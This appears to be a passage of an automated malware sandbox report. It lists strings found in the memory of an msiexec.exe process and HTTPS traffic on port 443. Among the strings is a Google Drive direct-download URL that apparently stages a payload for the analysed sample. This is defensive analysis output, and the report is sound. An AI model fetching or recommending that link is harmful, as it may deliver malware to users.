    Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2076123586.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadel
    Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadgo
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadid
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadio
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloado1
    Source: msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadoo
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadrZ
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloads
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadt
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466770656.0000000008030000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161884513.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220342182.0000000008030000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065182064.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2122487981.0000000008037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065182064.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2122487981.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185564841.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2076123586.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065019637.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087938810.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2146809082.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147213689.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135828611.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185564841.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2076123586.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065019637.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087938810.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2146809082.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147213689.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135828611.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
